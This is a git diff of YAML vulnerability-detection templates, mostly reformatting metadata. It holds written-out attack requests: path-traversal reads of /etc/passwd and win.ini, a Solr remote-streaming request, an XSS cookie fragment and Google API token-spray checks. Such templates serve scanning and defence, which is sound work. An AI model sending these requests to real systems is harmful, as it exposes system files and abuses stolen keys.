token-spray,google,fcm,firebase,cloud,messaging self-contained: true + http: - method: POST path: - "https://fcm.googleapis.com/fcm/send" + body: "{'registration_ids':['ABC']}" + headers: Authorization: key={{token}} Content-Type: application/json - matchers: - type: status status: diff --git a/http/token-spray/google-findplacefromtext.yaml b/http/token-spray/google-findplacefromtext.yaml index 19af2682ab..baff7f3c9e 100644 --- a/http/token-spray/google-findplacefromtext.yaml +++ b/http/token-spray/google-findplacefromtext.yaml @@ -4,11 +4,12 @@ info: name: Google Find Place From Text API Test author: zzeitlin severity: info - tags: token-spray,google,find,text metadata: max-request: 1 + tags: token-spray,google,find,text self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-gedistancematrix.yaml b/http/token-spray/google-gedistancematrix.yaml index d64ffafb9f..64d945396a 100644 --- a/http/token-spray/google-gedistancematrix.yaml +++ b/http/token-spray/google-gedistancematrix.yaml @@ -4,11 +4,12 @@ info: name: Google Distance Matrix API Test author: zzeitlin severity: info - tags: token-spray,google,distance,matrix metadata: max-request: 1 + tags: token-spray,google,distance,matrix self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-geocode.yaml b/http/token-spray/google-geocode.yaml index 15eea9e210..d4895c08a5 100644 --- a/http/token-spray/google-geocode.yaml +++ b/http/token-spray/google-geocode.yaml @@ -4,11 +4,12 @@ info: name: Google Geocode API Test author: zzeitlin severity: info - tags: token-spray,google,geocode metadata: max-request: 1 + tags: token-spray,google,geocode self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-geolocation.yaml b/http/token-spray/google-geolocation.yaml index 794adf3d5a..fea555a58e 100644 --- a/http/token-spray/google-geolocation.yaml +++ b/http/token-spray/google-geolocation.yaml @@ -4,11 +4,12 @@ info: name: Google Geolocation API Test author: zzeitlin severity: info - tags: token-spray,google,geolocation metadata: max-request: 1 + tags: token-spray,google,geolocation self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-mapsembed.yaml b/http/token-spray/google-mapsembed.yaml index ffe9219076..178c333be4 100644 --- a/http/token-spray/google-mapsembed.yaml +++ b/http/token-spray/google-mapsembed.yaml @@ -4,11 +4,12 @@ info: name: Google Maps Embed API Test author: zzeitlin severity: info - tags: token-spray,google,maps,embed metadata: max-request: 1 + tags: token-spray,google,maps,embed self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-mapsembedadvanced.yaml b/http/token-spray/google-mapsembedadvanced.yaml index d80538fc96..5780e94b62 100644 --- a/http/token-spray/google-mapsembedadvanced.yaml +++ b/http/token-spray/google-mapsembedadvanced.yaml @@ -4,11 +4,12 @@ info: name: Google Maps Embed (Advanced) API Test author: zzeitlin severity: info - tags: token-spray,google,maps,embed metadata: max-request: 1 + tags: token-spray,google,maps,embed self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-nearbysearch.yaml b/http/token-spray/google-nearbysearch.yaml index 33ec85b5ef..5d1684133a 100644 --- a/http/token-spray/google-nearbysearch.yaml +++ b/http/token-spray/google-nearbysearch.yaml @@ -4,11 +4,12 @@ info: name: Google Nearby Search API Test author: zzeitlin severity: info - tags: token-spray,google,search,nearby metadata: max-request: 1 + tags: token-spray,google,search,nearby self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-nearestroads.yaml b/http/token-spray/google-nearestroads.yaml index a477d5d658..5f21386a97 100644 --- a/http/token-spray/google-nearestroads.yaml +++ b/http/token-spray/google-nearestroads.yaml @@ -4,11 +4,12 @@ info: name: Google Nearest Roads API Test author: zzeitlin severity: info - tags: token-spray,google,roads metadata: max-request: 1 + tags: token-spray,google,roads self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-placedetails.yaml b/http/token-spray/google-placedetails.yaml index 15d5eb2fee..6bb7df9c86 100644 --- a/http/token-spray/google-placedetails.yaml +++ b/http/token-spray/google-placedetails.yaml @@ -4,11 +4,12 @@ info: name: Google Place Details API Test author: zzeitlin severity: info - tags: token-spray,google,place,details metadata: max-request: 1 + tags: token-spray,google,place,details self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-placesphoto.yaml b/http/token-spray/google-placesphoto.yaml index 55c9a956b3..41caf095a8 100644 --- a/http/token-spray/google-placesphoto.yaml +++ b/http/token-spray/google-placesphoto.yaml @@ -4,11 +4,12 @@ info: name: Google Places Photo API Test author: zzeitlin severity: info - tags: token-spray,google,places,photo metadata: max-request: 1 + tags: token-spray,google,places,photo self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-playablelocations.yaml b/http/token-spray/google-playablelocations.yaml index b5a7418366..de486e9017 100644 --- a/http/token-spray/google-playablelocations.yaml +++ b/http/token-spray/google-playablelocations.yaml @@ -4,11 +4,12 @@ info: name: Google Playable Locations API Test author: zzeitlin severity: info - tags: token-spray,google,playable,locations metadata: max-request: 1 + tags: token-spray,google,playable,locations self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-routetotraveled.yaml b/http/token-spray/google-routetotraveled.yaml index e16838e966..8b2b4e8e46 100644 --- a/http/token-spray/google-routetotraveled.yaml +++ b/http/token-spray/google-routetotraveled.yaml @@ -4,11 +4,12 @@ info: name: Google Route to Traveled API Test author: zzeitlin severity: info - tags: token-spray,google,route metadata: max-request: 1 + tags: token-spray,google,route self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-safebrowsing.yaml b/http/token-spray/google-safebrowsing.yaml index 7c433f3026..2d65e36f5f 100644 --- a/http/token-spray/google-safebrowsing.yaml +++ b/http/token-spray/google-safebrowsing.yaml @@ -8,11 +8,12 @@ info: reference: - https://developers.google.com/books/docs/overview - https://github.com/daffainfo/all-about-apikey/tree/main/google-safe-browsing - tags: token-spray,google,books metadata: max-request: 1 + tags: token-spray,google,books self-contained: true + http: - raw: - | @@ -26,4 +27,4 @@ http: words: - '"clientId"' - '"clientVersion"' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/google-speedlimit.yaml b/http/token-spray/google-speedlimit.yaml index 2fd36d226b..74f505578e 100644 --- a/http/token-spray/google-speedlimit.yaml +++ b/http/token-spray/google-speedlimit.yaml @@ -4,11 +4,12 @@ info: name: Google Speed Limit API Test author: zzeitlin severity: info - tags: token-spray,google,speed,limit metadata: max-request: 1 + tags: token-spray,google,speed,limit self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-staticmaps.yaml b/http/token-spray/google-staticmaps.yaml index e288e67b83..e7afe200e8 100644 --- a/http/token-spray/google-staticmaps.yaml +++ b/http/token-spray/google-staticmaps.yaml @@ -4,11 +4,12 @@ info: name: Google Static Maps API Test author: zzeitlin severity: info - tags: token-spray,google,maps metadata: max-request: 1 + tags: token-spray,google,maps self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-streetview.yaml b/http/token-spray/google-streetview.yaml index c8cc204f66..e7cb3eecc3 100644 --- a/http/token-spray/google-streetview.yaml +++ b/http/token-spray/google-streetview.yaml @@ -4,11 +4,12 @@ info: name: Google Static Streetview API Test author: zzeitlin severity: info - tags: token-spray,google,streetview metadata: max-request: 1 + tags: token-spray,google,streetview self-contained: true + http: - method: GET path: diff --git a/http/token-spray/google-timezone.yaml b/http/token-spray/google-timezone.yaml index a6a3ca559b..7a803706d3 100644 --- a/http/token-spray/google-timezone.yaml +++ b/http/token-spray/google-timezone.yaml @@ -4,11 +4,12 @@ info: name: Google Timezone API Test author: zzeitlin severity: info - tags: token-spray,google,timezone metadata: max-request: 1 + tags: token-spray,google,timezone self-contained: true + http: - method: GET path: diff --git a/http/token-spray/googlet-extsearchplaces.yaml b/http/token-spray/googlet-extsearchplaces.yaml index 4f9a80deb4..d1312239bd 100644 --- a/http/token-spray/googlet-extsearchplaces.yaml +++ b/http/token-spray/googlet-extsearchplaces.yaml @@ -4,11 +4,12 @@ info: name: Google Places Text Search API Test author: zzeitlin severity: info - tags: token-spray,google,search,places,text metadata: max-request: 1 + tags: token-spray,google,search,places,text self-contained: true + http: - method: GET path: diff --git a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml index 0d5ad418af..09691b229a 100644 --- a/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml +++ b/http/vulnerabilities/74cms/74cms-weixin-sqli.yaml @@ -9,11 +9,10 @@ info: reference: - https://cn-sec.com/archives/25900.html metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="骑士-74CMS" tags: 74cms,weixin,sqli - variables: num: '999999999' diff --git a/http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index bc8e21eef4..8dd156f60a 100644 --- a/http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -9,8 +9,8 @@ info: cvss-score: 9.3 cwe-id: CWE-441 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon @@ -27,6 +27,7 @@ http: stop-at-first-match: true unsafe: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml index 9fa810dc42..0a7f2adbd2 100644 --- a/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml +++ b/http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml @@ -17,15 +17,16 @@ info: cvss-score: 8.8 cve-id: CVE-2023-25194 cwe-id: CWE-502 - epss-score: 0.69218 - cpe: cpe:2.3:a:apache:kafka:*:*:*:*:*:*:*:* + epss-score: 0.92483 + epss-percentile: 0.98663 + cpe: cpe:2.3:a:apache:kafka_connect:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: html:"Apache Druid" verified: true + max-request: 1 vendor: apache - product: kafka - tags: cve,cve2023,apache,druid,kafka,rce,jndi,oast + product: kafka_connect + shodan-query: html:"Apache Druid" + tags: packetstorm,cve,cve2023,apache,druid,kafka,rce,jndi,oast http: - raw: diff --git a/http/vulnerabilities/apache/apache-flink-unauth-rce.yaml b/http/vulnerabilities/apache/apache-flink-unauth-rce.yaml index e63f694dc7..195bef3655 100644 --- a/http/vulnerabilities/apache/apache-flink-unauth-rce.yaml +++ b/http/vulnerabilities/apache/apache-flink-unauth-rce.yaml @@ -5,17 +5,14 @@ info: author: pikpikcu severity: critical description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: apache,flink,rce,intrusive,unauth metadata: max-request: 1 + tags: apache,flink,rce,intrusive,unauth http: - raw: @@ -38,12 +35,14 @@ http: - "application/json" part: header condition: and + - type: word words: - "success" - "_poc.jar" part: body condition: and + - type: status status: - 200 diff --git a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml index 135d244f08..0c34a87320 100644 --- a/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml @@ -6,12 +6,12 @@ info: severity: critical description: | Apache OFBiz is affected by a remote code execution vulnerability in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via a web request, to execute arbitrary code with the permission level of the running Java process. + remediation: Upgrade to Apache OFBiz version 8.12.03 or later. reference: - https://issues.apache.org/jira/browse/OFBIZ-12449 - https://ofbiz.apache.org/ - https://logging.apache.org/log4j/2.x/security.html - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - remediation: Upgrade to Apache OFBiz version 8.12.03 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 diff --git a/http/vulnerabilities/apache/apache-solr-file-read.yaml b/http/vulnerabilities/apache/apache-solr-file-read.yaml index 367742915a..d9b55439af 100644 --- a/http/vulnerabilities/apache/apache-solr-file-read.yaml +++ b/http/vulnerabilities/apache/apache-solr-file-read.yaml @@ -13,9 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: apache,solr,lfi metadata: max-request: 3 + tags: apache,solr,lfi http: - raw: @@ -24,13 +24,11 @@ http: Host: {{Hostname}} Accept-Language: en Connection: close - - | GET /solr/{{core}}/debug/dump?stream.url=file:///../../../../../Windows/win.ini¶m=ContentStream HTTP/1.1 Host: {{Hostname}} Accept-Language: en Connection: close - - | GET /solr/{{core}}/debug/dump?stream.url=file:///etc/passwd¶m=ContentStream HTTP/1.1 Host: {{Hostname}} @@ -38,6 +36,7 @@ http: Connection: close stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml index aa01eeb501..3f3f23833f 100644 --- a/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-log4j-rce.yaml @@ -19,8 +19,8 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"Apache Solr" tags: vulhub,cve,solr,oast,log4j,cve2021,rce,apache,jndi,kev variables: diff --git a/http/vulnerabilities/apache/apache-solr-rce.yaml b/http/vulnerabilities/apache/apache-solr-rce.yaml index de21fc6b71..965615c156 100644 --- a/http/vulnerabilities/apache/apache-solr-rce.yaml +++ b/http/vulnerabilities/apache/apache-solr-rce.yaml @@ -8,7 +8,7 @@ info: - https://web.archive.org/web/20230414152023/https://noahblog.360.cn/apache-solr-rce/ metadata: max-request: 2 - tags: solr,apache,rce,oast + tags: solr,apache,rce,oast,intrusive http: - raw: @@ -18,7 +18,6 @@ http: Content-Type: application/json { "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - - | POST /solr/gettingstarted_shard2_replica_n1/debug/dump?param=ContentStreams HTTP/1.1 Host: {{Hostname}} diff --git a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml index fe10c891c0..eff5b89b9b 100644 --- a/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml +++ b/http/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml @@ -18,9 +18,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 1 shodan-query: title:"Jamf Pro" - verified: true tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml b/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml index fd529e5d03..98462cd27f 100644 --- a/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml +++ b/http/vulnerabilities/apache/shiro/shiro-deserialization-detection.yaml @@ -18,7 +18,6 @@ http: GET / HTTP/1.1 Host: {{Hostname}} Cookie: JSESSIONID={{randstr}};rememberMe=123; - - | GET / HTTP/1.1 Host: {{Hostname}} @@ -26,18 +25,18 @@ http: payloads: key: helpers/wordlists/shiro_encrypted_keys.txt - req-condition: true stop-at-first-match: true + matchers-condition: and matchers: - - type: dsl + - type: dsl # WAF Block Page dsl: - 'contains(header_1, "Set-Cookie") && (contains(header_1, "rememberMe=") || contains(header_1, "=deleteMe"))' - '!contains(header_2, "rememberMe=") && !contains(header_2, "=deleteMe")' condition: and - - type: dsl # WAF Block Page + - type: dsl dsl: - '!contains(body_2, "

当前访问疑似黑客攻击,已被网站管理员设置拦截并记录

")' - '!contains(body_2, "很抱歉,由于您访问的URL有可能对网站造成安全威胁,您的访问被阻断")' diff --git a/http/vulnerabilities/avaya/avaya-aura-rce.yaml b/http/vulnerabilities/avaya/avaya-aura-rce.yaml index 9b7de4b927..d87a3eb7e4 100644 --- a/http/vulnerabilities/avaya/avaya-aura-rce.yaml +++ b/http/vulnerabilities/avaya/avaya-aura-rce.yaml @@ -14,10 +14,10 @@ info: cvss-score: 9.8 cwe-id: CWE-94 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: html:"Avaya Aura" - tags: rce,avaya,aura,iot + tags: rce,avaya,aura,iot,intrusive http: - raw: @@ -28,7 +28,6 @@ http: Connection: close alert(document.cookie)" part: body + - type: word words: - "text/html" diff --git a/http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml b/http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml index 24706e36dd..6a6c2defe9 100644 --- a/http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml +++ b/http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml @@ -11,19 +11,21 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: matrix,printer,edb,ibm,lfi metadata: max-request: 1 + tags: matrix,printer,edb,ibm,lfi http: - method: GET path: - '{{BaseURL}}/./../../../../../../../../../../etc/passwd' + matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/http/vulnerabilities/j2ee/liferay-resource-leak.yaml b/http/vulnerabilities/j2ee/liferay-resource-leak.yaml index c706f49712..c5dbf19bfe 100644 --- a/http/vulnerabilities/j2ee/liferay-resource-leak.yaml +++ b/http/vulnerabilities/j2ee/liferay-resource-leak.yaml @@ -14,8 +14,8 @@ info: cvss-score: 7.5 cwe-id: CWE-22 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Liferay" tags: liferay,lfi,j2ee diff --git a/http/vulnerabilities/jamf/jamf-blind-xxe.yaml b/http/vulnerabilities/jamf/jamf-blind-xxe.yaml index e15a906fd9..31e8fb59cd 100644 --- a/http/vulnerabilities/jamf/jamf-blind-xxe.yaml +++ b/http/vulnerabilities/jamf/jamf-blind-xxe.yaml @@ -6,9 +6,9 @@ info: severity: medium reference: - https://www.synack.com/blog/a-deep-dive-into-xxe-injection/ - tags: xxe,ssrf,jamf metadata: max-request: 1 + tags: xxe,ssrf,jamf http: - raw: @@ -44,10 +44,10 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "http" - type: word words: - - "com.jamfsoftware.jss" \ No newline at end of file + - "com.jamfsoftware.jss" diff --git a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml index a2a883c5f3..055250d457 100644 --- a/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml +++ b/http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -17,9 +17,9 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + verified: true max-request: 1 shodan-query: http.html:"JamF" - verified: true tags: cve,cve2021,rce,jndi,log4j,jamf,oast,kev variables: rand1: '{{rand_int(111, 999)}}' diff --git a/http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml b/http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml index 29bb04c12d..51872d4b16 100644 --- a/http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml +++ b/http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml @@ -9,14 +9,15 @@ info: - https://issues.jenkins.io/browse/JENKINS-30107 - https://issues.jenkins.io/browse/JENKINS-18884 - https://issues.jenkins.io/browse/JENKINS-26469 - tags: jenkins metadata: max-request: 1 + tags: jenkins http: - method: GET path: - "{{BaseURL}}/asynchPeople/" + matchers: - type: word words: diff --git a/http/vulnerabilities/jenkins/jenkins-script.yaml b/http/vulnerabilities/jenkins/jenkins-script.yaml index 1dc407c2ee..f4f9f23811 100644 --- a/http/vulnerabilities/jenkins/jenkins-script.yaml +++ b/http/vulnerabilities/jenkins/jenkins-script.yaml @@ -24,6 +24,7 @@ http: - "{{BaseURL}}/jenkins/script" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/http/vulnerabilities/jenkins/jenkins-stack-trace.yaml index b3004e92d0..f1f17123ad 100644 --- a/http/vulnerabilities/jenkins/jenkins-stack-trace.yaml +++ b/http/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -7,9 +7,9 @@ info: description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled. reference: - https://hackerone.com/reports/221833 - tags: jenkins,hackerone metadata: max-request: 1 + tags: jenkins,hackerone http: - method: GET diff --git a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml index 37464f866a..8cf4b12870 100644 --- a/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml +++ b/http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml @@ -4,9 +4,9 @@ info: name: Unauthenticated Jenkins Dashboard author: dhiyaneshDK severity: high - tags: jenkins metadata: max-request: 1 + tags: jenkins http: - method: GET diff --git a/http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml b/http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml index 747d32c1dc..56ffc148b4 100644 --- a/http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml +++ b/http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml @@ -7,9 +7,9 @@ info: description: | There is an arbitrary file read vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server metadata: - fofa-query: app="金和网络-金和OA" verified: true max-request: 1 + fofa-query: app="金和网络-金和OA" tags: jinhe,lfi,misconfig http: diff --git a/http/vulnerabilities/jira/jira-servicedesk-signup.yaml b/http/vulnerabilities/jira/jira-servicedesk-signup.yaml index 955269be14..7a2d66df3d 100644 --- a/http/vulnerabilities/jira/jira-servicedesk-signup.yaml +++ b/http/vulnerabilities/jira/jira-servicedesk-signup.yaml @@ -4,17 +4,16 @@ info: name: Atlassian Jira Service Desk Signup author: TechbrunchFR severity: medium - description: - This instance of Atlassian JIRA is misconfigured to allow an attacker to sign up (create a new account) just by navigating to the signup page that is accessible at the URL /servicedesk/customer/user/signup. After the attacker has created a new account it's possible for him/her to access the support portal. + description: This instance of Atlassian JIRA is misconfigured to allow an attacker to sign up (create a new account) just by navigating to the signup page that is accessible at the URL /servicedesk/customer/user/signup. After the attacker has created a new account it's possible for him/her to access the support portal. reference: - https://www.acunetix.com/vulnerabilities/web/atlassian-jira-servicedesk-misconfiguration/ - metadata: - max-request: 4 - shodan-query: http.component:"Atlassian Jira" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-287 + metadata: + max-request: 4 + shodan-query: http.component:"Atlassian Jira" tags: atlassian,servicedesk,jira,confluence http: @@ -22,7 +21,6 @@ http: - | GET /servicedesk/customer/user/signup HTTP/1.1 Host: {{Hostname}} - - | POST /servicedesk/customer/user/signup HTTP/1.1 Host: {{Hostname}} @@ -31,11 +29,9 @@ http: Referer: {{RootURL}}/servicedesk/customer/user/signup {"email":"","fullname":"{{randstr}}","password":"","captcha":"","secondaryEmail":""} - - | GET /secure/Signup!default.jspa HTTP/1.1 Host: {{Hostname}} - - | POST /secure/Signup.jspa HTTP/1.1 Host: {{Hostname}} @@ -52,4 +48,4 @@ http: words: - 'signup.validation.errors' - 'signup-username-error' - condition: or \ No newline at end of file + condition: or diff --git a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml index 308df6d029..b2a65d1a2e 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml @@ -2,7 +2,6 @@ id: jira-unauthenticated-dashboards # If public sharing is ON it allows users to share dashboards and filters with all users including # those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. - info: name: Jira Unauthenticated Dashboards author: TechbrunchFR @@ -16,6 +15,7 @@ http: - method: GET path: - "{{BaseURL}}/rest/api/2/dashboard?maxResults=100" + matchers: - type: word words: diff --git a/http/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml b/http/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml index 7e2998dbaa..1cbc3b7c23 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml @@ -17,6 +17,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/jira/jira-unauthenticated-projects.yaml b/http/vulnerabilities/jira/jira-unauthenticated-projects.yaml index 5dfa55baf0..12f0412c9d 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-projects.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-projects.yaml @@ -13,6 +13,7 @@ http: - method: GET path: - "{{BaseURL}}/rest/api/2/project?maxResults=100" + matchers: - type: word words: diff --git a/http/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml b/http/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml index 32f7394e52..2a2c21b649 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml @@ -30,4 +30,4 @@ http: - type: word part: header words: - - "atlassian.xsrf.token" \ No newline at end of file + - "atlassian.xsrf.token" diff --git a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml index 6cec61404d..bf1d208d4b 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-screens.yaml @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/rest/api/2/screens" max-size: 1000 + matchers-condition: and matchers: - type: word diff --git a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml index 8e0fe9df21..1ca272943a 100644 --- a/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml +++ b/http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml @@ -13,7 +13,8 @@ http: - method: GET path: - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" + matchers: - type: word words: - - 'user-picker' \ No newline at end of file + - 'user-picker' diff --git a/http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml b/http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml index 98f47d0a36..0d92896594 100644 --- a/http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml +++ b/http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml @@ -4,9 +4,9 @@ info: name: Jolokia Java Heap Information Disclosure author: milo2012 severity: info - tags: jolokia,disclosure,java metadata: max-request: 1 + tags: jolokia,disclosure,java http: - raw: diff --git a/http/vulnerabilities/joomla/joomla-department-sqli.yaml b/http/vulnerabilities/joomla/joomla-department-sqli.yaml index 5bd2be758e..598998e9ab 100644 --- a/http/vulnerabilities/joomla/joomla-department-sqli.yaml +++ b/http/vulnerabilities/joomla/joomla-department-sqli.yaml @@ -13,7 +13,6 @@ info: max-request: 1 shodan-query: http.component:"Joomla" tags: joomla,sqli - variables: num: "999999999" diff --git a/http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml b/http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml index fc7d05a24a..d52aa011b9 100644 --- a/http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml +++ b/http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml @@ -5,26 +5,28 @@ info: author: daffainfo severity: high description: A local file inclusion vulnerability in the Jvehicles (com_jvehicles) component version 1.0 for Joomla! allows remote attackers to load arbitrary files via the controller parameter in index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11997 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 - remediation: Upgrade to the latest version to mitigate this vulnerability. - tags: joomla,lfi,edb metadata: max-request: 1 + tags: joomla,lfi,edb http: - method: GET path: - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00" + matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" + - type: status status: - 200 diff --git a/http/vulnerabilities/joomla/rusty-joomla.yaml b/http/vulnerabilities/joomla/rusty-joomla.yaml index 75a1c26ffb..4cbd81fac5 100644 --- a/http/vulnerabilities/joomla/rusty-joomla.yaml +++ b/http/vulnerabilities/joomla/rusty-joomla.yaml @@ -11,18 +11,17 @@ info: - https://github.com/kiks7/rusty_joomla_rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: joomla,rce,unauth,php,cms,objectinjection metadata: max-request: 2 + tags: 